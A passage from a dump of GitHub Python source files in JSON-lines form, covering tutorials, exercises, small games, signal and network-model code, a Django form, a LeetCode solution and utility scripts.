truthy\n\nresult = bool(0) or bool('') or bool(None) or bool(100)\nprint(result)\n\nresult = bool(0) # f\nresul = result or bool('') #f\nresult = result or bool(None) # f\nresult = result or bool(100) # t\n\n# == Any\nprint(reduce(lambda a, b : bool(a) or bool(b), l))\n\n# Calculating the product of all elements in an iterable\n# ------------------------------------------------------\n\nl = [1, 3, 5, 6]\n\nprint(reduce(lambda a, b : a * b, l))\n\n# Calculating n!\n# --------------\n# 5! = 1 * 2 * 3 * 4 * 5\n\nrange(1, 6) # se multiplicar esses números do range encontramos o fatorial de 5\n\nprint(reduce(lambda a, b: a * b, range(1, 5+1) ))\n\n# The reduce initializer\n\"\"\"\nThe reduce funtion has a third (option) parameter: initializer (defaults to None).\n!! Soma de uma lista usar um initializer de 0 pq nao afeterá a lista.\n!! Para multiplicação usar initiailzer igual 1. \n\n\"\"\"\n\nl = []\n# print(reduce(lambda x, y: x + y, l)) -- > exception\n\nl = []\nprint(reduce(lambda x, y: x + y, l, 1)) # initializer = 1\n\nl = [1, 2, 3]\nprint(reduce(lambda x, y: x + y, l, 100)) # 106\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"rafael1717y/repo-python","sub_path":"deep_dive_python/32.secao_6_reducing_functions1.py","file_name":"32.secao_6_reducing_functions1.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4872011017","text":"import pandas as pd \nimport numpy.random as rand \nfrom rbf import *\nfrom sklearn.metrics import mean_squared_error\nfrom timeit import default_timer as timer \n\ndata = pd.read_csv(\"sin.csv\", \";\") \nX = data[data.columns[:-1]] \ny = data[data.columns[-1]]\n\nX = X.as_matrix()\ny = y.as_matrix()\n\nstart = timer() \n\nfor i in range(10):\n model = RBFNet(10, p=0.1, compute_widths='none')\n model.fit(X,y) \n yy = model.predict(X)\n\n err = 100*mean_squared_error(y, yy)\n print(\"Err:\", err)\n\nend = timer() \nprint(\"Time:\", end - start) \n\nfrom sklearn.externals import joblib \n\njoblib.dump(model, \"rbf.pkl\")\nmodel2 = joblib.load(\"rbf.pkl\") \n\nyy = model2.predict(X)\nerr = 100*mean_squared_error(y, yy)\nprint(\"Err after load:\", err) \n","repo_name":"PetraVidnerova/pyRBF","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43365445644","text":"age = int(input())\nneed_sum = float(input())\ntoy_price = int(input())\nsum = 0\nreciver_money = 0\nfor i in range(1,age+1):\n if i % 2 == 0:\n reciver_money += 10\n sum = sum + (reciver_money - 1)\n\n else:\n sum = sum + toy_price\nif need_sum > sum:\n print(f'No! {need_sum - sum:.2f}')\nelse:\n print(f'Yes! {sum - need_sum:.2f}')","repo_name":"StoyanNakov/SoftUni","sub_path":"Programming Basics with Python - june 2022/For Loop - Exercise/04. Clever Lily/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32248982991","text":"from board import Board\nfrom player import Player\n\nclass Game:\n def __init__(self,players,board,turn):\n self.players = []\n self.board = Board(6,7)\n self.turn = 0\n \n def play_game(self):\n print(\"Welcome to Connect 4!\")\n print(\"Get four of your pieces in a row to win!\")\n \n self.players.append(Player('x'))\n self.players.append(Player('y'))\n self.board.disp_board()\n while True:\n try:\n self.players[turn].get_choice(self.players[turn].name)\n self.board.add_piece(choice,self.players[turn])\n self.board.disp_board()\n if self.board.is_full() == True:\n raise ValueError(\"Board is full!\")\n if self.board.is_full() == False:\n continue\n if self.board.check_winner() == True:\n print(f\"{self.players[turn].name} has won the game!\")\n \n turn = (turn + 1) % 2\n \n \n except:\n if self.board.is_full() == True:\n raise ValueError(\"Board is full!\")\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \ndef main():\n game = Game()\n game.Game()\n\n \n \nif __name__== \"__main__\":\n main()\n ","repo_name":"EthanH44/connectfour","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40787247336","text":"import math\r\nfrom collections import Counter\r\n\r\n\r\ndef isPrime(n):\r\n\tfor i in range(2, int(math.sqrt(n)) + 1):\r\n\t\tif n % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\n\r\ndef get_next_prime(prime):\r\n\tprime += 1\r\n\twhile not isPrime(prime):\r\n\t\tprime += 1\r\n\treturn prime\r\n\r\n\r\ndef count_div(n):\r\n\ta = []\r\n\twhile n != 1:\r\n\t\ti = 2\r\n\t\tif n % i == 0:\r\n\t\t\ta.append(i)\r\n\t\t\tn = n / i\r\n\t\telse:\r\n\t\t\twhile n % i:\r\n\t\t\t\ti = get_next_prime(i)\r\n\t\t\ta.append(i)\r\n\t\t\tn = n / i\r\n\tb = [0]\r\n\ta = Counter(a)\r\n\tlist_keys = list(a.keys())\r\n\tj = 2\r\n\tcount = 0\r\n\tfor i in list_keys:\r\n\t\twhile j != i:\r\n\t\t\tj = get_next_prime(j)\r\n\t\t\tb.append(0)\r\n\t\t\tcount += 1\r\n\t\tb[count] = a[i]\r\n\tamount = 1\r\n\tfor i in range(len(b)):\r\n\t\tamount *= b[i] + 1\r\n\treturn amount\r\n\r\n\r\ni, number = 1, 1\r\nwhile count_div(number) < 500:\r\n\ti += 1\r\n\tnumber += i\r\nprint(number)\r\n","repo_name":"nikervm/Project-Euler","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9200621646","text":"import h5py\nimport argparse\n\nimport numpy as np\nfrom scipy.signal import welch, hann\n\nfrom lsl.reader.ldp import LWASVDataFile\n\ndef estimate_snr(data, fft_len, target_freq, fs, fc):\n '''\n Uses Welch's periodogram method to estimate signal and noise powers.\n '''\n\n # use a periodic hann window\n win = hann(fft_len, sym=False)\n\n # overlap is nperseg // 2 by default\n freqs, pxx = welch(x=data, fs=fs, nperseg=fft_len, return_onesided=False, window=win, detrend=False)\n\n # shift frequencies up from baseband\n freqs += fc\n\n target_bin = np.argmin([abs(target_freq - f) for f in freqs])\n\n print(f\"using bin {target_bin}\")\n \n # the window shape will show how the signal leaks into neighboring bins\n # compute the bin shape in the frequency domain\n fwin = np.abs(np.fft.fft(win))\n # center it where we think the signal is\n fwin = np.roll(fwin, target_bin)\n # the signal leaks where the window magnitude is large\n sig_idx = np.abs(fwin) > 1\n nosig_idx = np.invert(sig_idx)\n \n noise_density_est = pxx[nosig_idx].mean()\n noise_power_est = noise_density_est * fs\n\n sig_bins = pxx[sig_idx]\n sig_power_est = (np.sum(sig_bins) - len(sig_bins) * noise_density_est) * fs / fft_len\n\n snr_est = sig_power_est / noise_power_est\n\n return snr_est\n","repo_name":"mistic-lab/lwa-tools","sub_path":"lwatools/utils/bin_power.py","file_name":"bin_power.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13887169324","text":"from NewCoordinates import NewCoordinates\nimport pygame\n\n\nclass BallDirection:\n def __init__(self, screen,ball):\n self.screen = screen\n # Le point de prédiction final \n self.final_y = 0\n # Les prochaines coordonnées de la balle \n self.next_coordinates= NewCoordinates(0,0,0,0)\n # les coordonées final de la balle \n self.final_coordinates = NewCoordinates(0,0,0,0)\n self.ball=ball\n \n\n # Fonction permettant de prédire les nouveaux coordonées de la balle\n def predict_next_coordinate(self):\n ball= self.ball\n\n # On calcule les nouveaux coordonnées\n self.next_coordinates = NewCoordinates(\n ball.x_middle(), ball.y_middle(), ball.get_dx(), ball.get_dy())\n next_coordinates = self.next_coordinates\n \n # Si la balle a toucher un mur alors on doit recalculer le vecteur\n if next_coordinates.hit_top_or_bottom():\n self.final_coordinates = NewCoordinates(next_coordinates.get_new_x(\n ), next_coordinates.get_new_y(), ball.get_dx(), -ball.get_dy())\n self.final_y = self.final_coordinates.get_new_y()\n else:\n self.final_y = next_coordinates.get_new_y()\n \n\n # Fonction permettant de dessiner le vecteur prédit\n def draw(self):\n ball= self.ball\n next_coordinates = self.next_coordinates\n final_coordinates = self.final_coordinates\n x_middle = ball.x_middle()\n y_middle = ball.y_middle()\n if next_coordinates.hit_top_or_bottom():\n pygame.draw.line(self.screen, (255, 0, 0), (ball.x_middle(),\n ball.y_middle()), (next_coordinates.get_new_x(), next_coordinates.get_new_y()), 1)\n \n pygame.draw.line(self.screen, (255, 0, 0), (next_coordinates.get_new_x(\n ), next_coordinates.get_new_y()), (final_coordinates.get_new_x(), final_coordinates.get_new_y()), 1)\n else:\n pygame.draw.line(self.screen, (255, 0, 0), (ball.x_middle(),\n ball.y_middle()), (next_coordinates.get_new_x(), next_coordinates.get_new_y()), 1)\n\n def get_ball_prediction_y(self):\n return self.final_y\n","repo_name":"otmanerahim/pong-mission-stage","sub_path":"TP5/TP5/BallDirection.py","file_name":"BallDirection.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41055755064","text":"import networkx as nx\nimport numpy as np\n\nfrom abc import ABC, abstractmethod\nfrom networkx.algorithms.components import connected_components\nfrom numpy import random\nfrom typing import Dict, List, Set, Tuple\n\nfrom src.epinet.agent import Agent\nfrom src.utils.logger import get_logger\n\n\nlogger = get_logger(__name__)\n\n\nclass EpistemicNetwork(ABC):\n # TODO: documentation\n STATE_CORRECT_CONSENSUS = 'Correct Consensus'\n STATE_INCORRECT_CONSENSUS = 'Incorrect Consensus'\n STATE_CORRECT_DISAGREEMENT = 'Correct Disagreement'\n STATE_INCORRECT_DISAGREEMENT = 'Incorrect Disagreement'\n\n def __init__(\n self,\n structure: Dict[str, Set[str]],\n alpha_action_payoff: float,\n beta_action_payoff: float,\n consensus_threshold: float,\n trials_nr: int\n ):\n g = nx.Graph(structure)\n g.remove_edges_from(nx.selfloop_edges(g))\n undirected_structure = nx.convert.to_dict_of_lists(g)\n self.adjacency_list = undirected_structure\n self.id_to_agents = {int(i): Agent(int(i), random.uniform(0, 1), undirected_structure[i]) for i in\n undirected_structure.keys()}\n self.alpha_action_payoff = alpha_action_payoff\n self.beta_action_payoff = beta_action_payoff\n self.epsilon = self.beta_action_payoff - self.alpha_action_payoff\n self.consensus_threshold = consensus_threshold\n self.nr_trials = trials_nr\n\n def run_evidence_collection(self):\n for agent in self.id_to_agents.values():\n agent.get_evidence(self.nr_trials, self.alpha_action_payoff, self.beta_action_payoff)\n\n def run_credence_update(self):\n for agent in self.id_to_agents.values():\n sum_trials_nr = agent.trials_nr + sum(\n [self.id_to_agents[neighbor].trials_nr for neighbor in agent.neighbors if neighbor in self.id_to_agents.keys()])\n sum_successes_nr = agent.successes_nr + sum(\n [self.id_to_agents[neighbor].successes_nr for neighbor in agent.neighbors if neighbor in self.id_to_agents.keys()])\n if sum_trials_nr > 0:\n agent.update_credence(sum_trials_nr, sum_successes_nr, self.epsilon)\n\n def get_agents(self, subset_ids: Set[str]) -> List[Agent]:\n if subset_ids:\n agents = [agent for agent_id, agent in self.id_to_agents.items() if agent_id in subset_ids]\n else:\n agents = self.id_to_agents.values()\n return agents\n\n def is_incorrect_disagreement(self, subset_ids: Set[str] = None) -> bool:\n is_correct_disagreement = False\n alpha_action_voters_nr, beta_action_voters_nr = self.get_actions_voters_nr(subset_ids)\n if not self.is_alpha_consensus() and alpha_action_voters_nr >= beta_action_voters_nr:\n is_correct_disagreement = True\n return is_correct_disagreement\n\n def is_correct_disagreement(self, subset_ids: Set[str] = None) -> bool:\n is_incorrect_disagreement = False\n alpha_action_voters_nr, beta_action_voters_nr = self.get_actions_voters_nr(subset_ids)\n if not self.is_beta_consensus() and beta_action_voters_nr > alpha_action_voters_nr:\n is_incorrect_disagreement = True\n return is_incorrect_disagreement\n\n def is_alpha_consensus(self, subset_ids: Set[str] = None) -> bool:\n agents = self.get_agents(subset_ids)\n is_alpha_consensus = all( agent.credence < self.alpha_action_payoff for agent in agents)\n return is_alpha_consensus\n\n def is_beta_consensus(self, subset_ids: Set[str] = None) -> bool:\n agents = self.get_agents(subset_ids)\n is_beta_consensus = all(agent.credence > self.consensus_threshold for agent in agents)\n return is_beta_consensus\n\n def is_consensus(self, subset_ids: Set[str] = None) -> bool:\n \"\"\"\n Checks if there is a consensus regarding superiority of one of the actions.\n \"\"\"\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n return self.is_alpha_consensus(subset_ids) or self.is_beta_consensus(subset_ids)\n\n def get_connected_agents_ids(self) -> Set[str]:\n connected_agents_ids = {i for i, a in self.id_to_agents.items() if a.neighbors}\n return connected_agents_ids\n\n def get_state(self, subset_ids: Set[str] = None) -> str:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n state = ''\n if self.is_alpha_consensus(subset_ids):\n state = self.STATE_INCORRECT_CONSENSUS\n elif self.is_beta_consensus(subset_ids):\n state = self.STATE_CORRECT_CONSENSUS\n elif self.is_incorrect_disagreement(subset_ids):\n state = self.STATE_INCORRECT_DISAGREEMENT\n elif self.is_correct_disagreement(subset_ids):\n state = self.STATE_CORRECT_DISAGREEMENT\n return state\n\n def get_mean_credence(self, subset_ids: Set[str] = None) -> float:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n agents = self.get_agents(subset_ids)\n return np.mean([agent.credence for agent in agents])\n\n def get_actions_voters_nr(self, subset_ids: Set[str] = None) -> Tuple[int, int]:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n agents = self.get_agents(subset_ids)\n alpha_action_voters_nr = len(list(a for a in agents if a.credence <= self.alpha_action_payoff))\n beta_action_voters_nr = len(list(a for a in agents if a.credence > self.alpha_action_payoff))\n return alpha_action_voters_nr, beta_action_voters_nr\n\n def to_networkx_graph(self):\n return nx.Graph(self.adjacency_list)\n\n def get_connected_components(self) -> List[Set[str]]:\n g = self.to_networkx_graph()\n cc = [cc for cc in connected_components(g)]\n return cc\n\n def get_states_of_connected_components(self) -> List[Tuple[int, str]]:\n cc = self.get_connected_components()\n states = []\n for i, c in enumerate(cc):\n state = self.get_state(c)\n states.append((len(c), state))\n return states\n\n def print_agents(self):\n for agent in self.id_to_agents.values():\n print(f\" -> Agent {agent.id}, cred: {agent.credence:.2f}, trials_nr: {agent.trials_nr}, succ_nr: {agent.successes_nr}, neighbours: {agent.neighbors}\")\n\n def describe(self):\n print('Agents details')\n self.print_agents()\n print(f'Consensus check: {self.is_consensus()}')\n print(f'State: {self.get_state()}')\n print(f'Mean credence: {self.get_mean_credence()}')\n print(f'Action voters: {self.get_actions_voters_nr()}')\n print()\n\n def get_status(self):\n result = []\n state = self.get_state()\n alpha_voters, beta_voters = self.get_actions_voters_nr()\n mean_credence = self.get_mean_credence()\n connected_comps = self.get_connected_components()\n connected_comps_nr = len(connected_comps)\n for connected_component_id, subset in enumerate(connected_comps):\n cc_size = len(subset)\n cc_state = self.get_state(subset)\n cc_alpha_voters, cc_beta_voters = self.get_actions_voters_nr(subset)\n cc_mean_credence = self.get_mean_credence(subset)\n row = (state, alpha_voters, beta_voters, mean_credence, connected_comps_nr, connected_component_id, cc_size, cc_state, cc_alpha_voters, cc_beta_voters, cc_mean_credence)\n result.append(row)\n return result\n\n def get_current_status(self):\n connected_comps = self.get_connected_components()\n biggest_cc = max(connected_comps, key=len)\n alpha_voters, beta_voters = self.get_actions_voters_nr()\n biggest_cc_av, biggest_cc_bv = self.get_actions_voters_nr(biggest_cc)\n status = {\n 'full_net_state': self.get_state(),\n 'full_net_av': alpha_voters,\n 'full_net_bv': beta_voters,\n 'full_net_cred': self.get_mean_credence(),\n 'big_cc_state': self.get_state(biggest_cc),\n 'big_cc_av': biggest_cc_av,\n 'big_cc_bv': biggest_cc_bv,\n 'big_cc_cred': self.get_mean_credence(biggest_cc),\n #'rest_cc_status': 1,\n #'rest_cc_av': 1,\n #'rest_cc_bv': 1,\n #'rest_cc_cred': 1\n }\n return status\n\n\nclass StaticEpistemicNetwork(EpistemicNetwork):\n pass\n\n\nclass DynamicEpistemicNetwork(EpistemicNetwork):\n\n def update_structure(self, adjacency_list: Dict[str, Set[str]]):\n \"\"\"\n\n :param adjacency_list:\n :return:\n \"\"\"\n g = nx.Graph(adjacency_list)\n g.remove_edges_from(nx.selfloop_edges(g))\n adjacency_list = nx.convert.to_dict_of_lists(g)\n self.adjacency_list = adjacency_list\n #print(self.adjacency_list)\n\n current_agents_ids = set(self.id_to_agents.keys())\n new_structure_agent_ids = set(self.adjacency_list.keys())\n\n ids_agents_to_detach = current_agents_ids.difference(new_structure_agent_ids)\n ids_agents_to_update = current_agents_ids.intersection(new_structure_agent_ids)\n ids_agents_to_create = new_structure_agent_ids.difference(current_agents_ids)\n\n #logger.info(f'Agents to detach: {ids_agents_to_detach}')\n #logger.info(f'Agents to update: {ids_agents_to_update}')\n #logger.info(f'Agents to create: {ids_agents_to_create}')\n\n # 1. agents not present in new structure\n for agent_id in ids_agents_to_detach:\n self.id_to_agents[agent_id].set_neighbors(set())\n self.adjacency_list[agent_id] = set()\n\n # 2. Update agents present in new structure\n for agent_id in ids_agents_to_update:\n self.id_to_agents[agent_id].set_neighbors(self.adjacency_list[agent_id])\n\n # 3. Create new agents for ids present only in new structure\n for agent_id in ids_agents_to_create:\n self.id_to_agents[agent_id] = Agent(agent_id, random.uniform(0, 1), self.adjacency_list[agent_id])\n\n def get_state_of_connected_components(self):\n pass\n","repo_name":"KE4T5/network-epistemology","sub_path":"src/epinet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11160335075","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nfrom . import models\n\n\nclass TeeOffTimeAdminForm(forms.ModelForm):\n sales = forms.FloatField(\n label=_('Sales'),\n required=False,\n )\n\n profit = forms.FloatField(\n label=_('Profit'),\n required=False,\n )\n\n def __init__(self, *args, **kwargs):\n super(TeeOffTimeAdminForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = models.TeeOffTime\n fields = '__all__'\n","repo_name":"pincoin/naonegolf","sub_path":"windmill/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285141628","text":"#\n# @lc app=leetcode id=34 lang=python3\n#\n# [34] Find First and Last Position of Element in Sorted Array\n#\n# https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/description/\n#\n# algorithms\n# Medium (35.04%)\n# Likes: 2593\n# Dislikes: 116\n# Total Accepted: 421.1K\n# Total Submissions: 1.2M\n# Testcase Example: '[5,7,7,8,8,10]\\n8'\n#\n# Given an array of integers nums sorted in ascending order, find the starting\n# and ending position of a given target value.\n# \n# Your algorithm's runtime complexity must be in the order of O(log n).\n# \n# If the target is not found in the array, return [-1, -1].\n# \n# Example 1:\n# \n# \n# Input: nums = [5,7,7,8,8,10], target = 8\n# Output: [3,4]\n# \n# Example 2:\n# \n# \n# Input: nums = [5,7,7,8,8,10], target = 6\n# Output: [-1,-1]\n# \n#\n\n# @lc code=start\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n\n def extreme_insertion_index(nums, target, left):\n lo, hi = 0, len(nums)\n\n while lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] > target or (left and target == nums[mid]):\n hi = mid\n else:\n lo = mid + 1\n\n return lo\n\n left_idx = extreme_insertion_index(nums, target, True)\n\n if left_idx == len(nums) or nums[left_idx] != target:\n return [-1, -1]\n\n return [left_idx, extreme_insertion_index(nums, target, False) - 1]\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_name":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28832107148","text":"#!/usr/bin/env python\n\nimport subprocess\n\ndef main():\n ps_text = subprocess.check_output(\n 'ps -e -o pcpu,rss,comm --no-headers --sort=-pcpu | head',\n shell=True)\n ps_text = ps_text.decode()\n print(ps_text)\n ps_lines = ps_text.split('\\n')\n print(ps_lines)\n for line in ps_lines:\n if not line:\n continue\n pcpu, rss, command = line.split(None, 2)\n usage = int(float(pcpu) * int(rss) / 100.)\n print(usage, command)\n\nif __name__=='__main__':\n main()\n","repo_name":"johntellsall/johntellsall.com","sub_path":"quality-prog-ops/checkusage2.py","file_name":"checkusage2.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11463476725","text":"import re\nfrom xpinyin import Pinyin\n\n\ndef alter(file, old_str='', new_str=''):\n \"\"\"\n 替换文件中的字符串\n :param file:文件名\n :param old_str:就字符串\n :param new_str:新字符串\n :return:\n \"\"\"\n p = Pinyin()\n file_data = \"\"\n title_pattern = 'title: ?\"(.*)?\"'\n slug_pattern = 'slug:(.*)?'\n with open(file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n match_slug = re.match(slug_pattern, line, re.M | re.I)\n print(match_slug)\n if match_slug:\n slug = match_slug.group(1)\n if slug:\n line = ''\n\n match_title = re.match(title_pattern, line, re.M | re.I)\n if match_title:\n title = match_title.group(1)\n if title:\n title_pinyin = p.get_pinyin(title, ' ')\n print(title_pinyin)\n title_pinyin = re.sub(\"[^a-zA-Z-0-9.]+\", \" \", title_pinyin)\n title_pinyin = re.sub(\" +\", \" \", title_pinyin)\n print(title_pinyin)\n new_str = 'slug: \"' + title_pinyin + '\"\\n'\n line = new_str + line\n\n file_data += line\n with open(file, \"w\", encoding=\"utf-8\") as f:\n f.write(file_data)\n\n# alter(\"C:\\www\\code\\whzywxt.github.io\\content\\post\\PHP常用算法.md\", \"PHP常用算法\", \"python\")\n","repo_name":"whzywxt/books","sub_path":"python/file_replace.py","file_name":"file_replace.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73393353124","text":"import argparse, json\n\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.patches as mpatches\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport seaborn as sns\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom utils import combine_columns, scale\n\n\nTRACTS = '../../Data/tract_geo_data.json'\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str, required=True)\n parser.add_argument('-o', '--output', type=str, required=True)\n parser.add_argument('-b', '--biastype', type=str, required=True)\n args = parser.parse_args()\n inpath, outpath, biastype = args.input, args.output, args.biastype\n\n tracts = json.load(open(TRACTS, 'r'))\n pdict = { tract: tracts[tract]['properties']['population'] for tract in tracts }\n adict = { tract: tracts[tract]['properties']['aland'] for tract in tracts }\n\n header = np.loadtxt(inpath, delimiter=',', max_rows=1, dtype=np.str)\n data = np.loadtxt(inpath, delimiter=',', skiprows=1)\n \n # Remove rows with any NaN values\n nanrows = np.asarray([idx for idx in range(data.shape[0]) if np.isnan(data[idx, :]).any()])\n if nanrows.shape[0] > 0: data = np.delete(data, nanrows, axis=0)\n\n # Remove rows where requested bias type is 0\n zrows = np.argwhere(data[:, np.argwhere(header==biastype)[0, 0]] == 0).flatten()\n data = np.delete(data, zrows, axis=0)\n\n colpairs = [\n [\"Non-White\", \"White alone\"],\n [\"Generation X + Boomer + Silent\", \"Millenials + Gen Z\"],\n [\"High school diploma or less\", \"College Degree\"],\n [\"Below Poverty Line\", \"Above Poverty Line\"],\n [\"Not a U.S. citizen\", \"U.S. citizen\"],\n [\"Below Median House Price\", \"Above Median House Price\"]\n ]\n\n # Calculate Population Density\n header = np.concatenate([header, ['Population Density']])\n pops = np.asarray([pdict[str(int(data[idx, np.argwhere(header=='Census Tract')[0, 0]]))] for idx in range(data.shape[0])]).reshape((-1, 1)).astype(np.float64)\n areas = np.asarray([adict[str(int(data[idx, np.argwhere(header=='Census Tract')[0, 0]]))] for idx in range(data.shape[0])]).reshape((-1, 1)).astype(np.float64)\n pops /= areas\n data = np.concatenate([data, pops], axis=1)\n\n # Scale pickup and dropoff count by area in census tract\n ctidx = np.argwhere(header==\"Census Tract\")[0, 0]\n pidx = np.argwhere(header==\"Pickup Count\")[0, 0]\n didx = np.argwhere(header==\"Dropoff Count\")[0, 0]\n for aridx in range(data.shape[0]):\n tract = str(int(data[aridx, ctidx]))\n area = adict[tract]\n data[aridx, pidx] /= area\n data[aridx, didx] /= area\n\n # Calculate demographic ratios from raw counts\n for pair in colpairs:\n c1, c2 = pair\n c1idx = np.argwhere(header==c1)[0, 0]\n c2idx = np.argwhere(header==c2)[0, 0]\n data[np.argwhere(data[:, c1idx] < 0), c1idx] = 0\n data[np.argwhere(data[:, c2idx] < 0), c2idx] = 0\n\n # Total population for each census tract\n rtotal = data[:, c1idx] + data[:, c2idx]\n\n # Percentage of population of each census tract\n for ridx in range(data.shape[0]):\n if rtotal[ridx] != 0:\n data[ridx, c1idx] /= rtotal[ridx]\n data[ridx, c2idx] /= rtotal[ridx]\n\n else:\n data[ridx, c1idx] = 0\n data[ridx, c2idx] = 0\n\n added_header = []\n added_cols = []\n for pair in colpairs:\n keep, toss = pair\n kidx = np.argwhere(header==keep)[0, 0]\n col = data[:, kidx].reshape((-1, 1))\n added_header.append('%s Percentage' % keep)\n added_cols.append(col)\n\n header = np.concatenate([header, added_header])\n added_cols = np.hstack(added_cols)\n data = np.concatenate([data, added_cols], axis=1)\n\n for pair in colpairs:\n c1, c2 = pair\n\n c1idx = np.argwhere(header==c1)[0, 0]\n dargs = np.delete(np.arange(header.shape[0]), c1idx)\n header = header[dargs]\n data = data[:, dargs]\n\n c2idx = np.argwhere(header==c2)[0, 0]\n dargs = np.delete(np.arange(header.shape[0]), c2idx)\n header = header[dargs]\n data = data[:, dargs]\n\n cols = [\n \"Pickup Count\", \"Dropoff Count\", \n \"Non-White Percentage\", \"Generation X + Boomer + Silent Percentage\", \n \"High school diploma or less Percentage\", \"Below Poverty Line Percentage\", \n \"Not a U.S. citizen Percentage\", \"Below Median House Price Percentage\", \n ]\n\n spercs = set([\n \"Non-White Percentage\", \"Generation X + Boomer + Silent Percentage\",\n \"High school diploma or less Percentage\", \"Below Poverty Line Percentage\", \n \"Not a U.S. citizen Percentage\", \"Below Median House Price Percentage\"\n ])\n\n cidxs = np.asarray([np.argwhere(header==col)[0, 0] for col in cols if col in header])\n tidx = np.argwhere(header==biastype)[0, 0]\n\n eslists, xlists, titles = [], [], []\n for cidx in cidxs:\n titles.append(header[cidx])\n cargs = np.argsort(data[:, cidx])\n data = data[cargs]\n\n eslist, xlist, var_ds = [], [], []\n std = np.std(data[:, tidx])\n for ridx in range(1, data.shape[0]-1):\n nrval = np.mean(data[ridx:, tidx])\n rval = np.mean(data[:ridx, tidx])\n d = (rval - nrval) / std\n eslist.append(d)\n xlist.append(data[ridx, cidx])\n\n eslist = np.asarray(eslist)\n xlist = np.asarray(xlist)\n eslists.append(eslist)\n xlists.append(xlist)\n\n eslists = np.asarray(eslists)\n xlists = np.asarray(xlists)\n\n tnames = {\n 'Pickup Count': '# of pickups', \n 'Dropoff Count': '# of dropoffs', \n 'Non-White Percentage': '% of non-white pop', \n 'Generation X + Boomer + Silent Percentage': '% of >= 40 pop', \n 'High school diploma or less Percentage': '% of highschool educated or less pop', \n 'Below Poverty Line Percentage': '% below poverty line', \n 'Not a U.S. citizen Percentage': '% non-U.S. citizens', \n 'Below Median House Price Percentage': '% living in homes < median house price'\n }\n\n titles = [tnames[title] for title in titles]\n\n fig, axarr = plt.subplots(2, 4, figsize=(15, 7))\n\n ridx = cidx = 0\n for eidx in range(len(eslists)):\n eslist = eslists[eidx]\n xlist = xlists[eidx]\n axarr[ridx][cidx].plot(xlist, eslist)\n axarr[ridx][cidx].set_title(titles[eidx])\n if cidx >= 3: ridx +=1; cidx = 0\n else: cidx += 1\n\n plt.savefig(outpath, bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"akshat0123/RShareChicago","sub_path":"RShare/analysis/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26846623527","text":"import inhouse_bot.common_utils.lol_api.tasks as lol\nfrom typing import List, Dict, Tuple\nfrom inhouse_bot.database_orm import Game, GameParticipant\nfrom inhouse_bot.dataclasses.GameInfo import GameInfo\nfrom sqlalchemy import BigInteger\nimport logging\nfrom inhouse_bot.common_utils.fields import SideEnum, RoleEnum\n\n\nasync def find_team_and_lane_mmr(team: List[GameParticipant]) -> GameInfo:\n \"\"\"\n 1. Sum the MMR each team\n 2. Compare the MMR of each player and their lane opponent\n 3. Attempt to find the smallest possible difference among MMR\n \"\"\"\n\n mmrValues = {\n \"IRONIV\": 200,\n \"IRONIII\": 400,\n \"IRONII\": 800,\n \"IRONI\": 1000,\n \"BRONZEIV\": 1100,\n \"BRONZEIII\": 1150,\n \"BRONZEII\": 1250,\n \"BRONZEI\": 1300,\n \"SILVERIV\": 1400,\n \"SILVERIII\": 1450,\n \"SILVERII\": 1550,\n 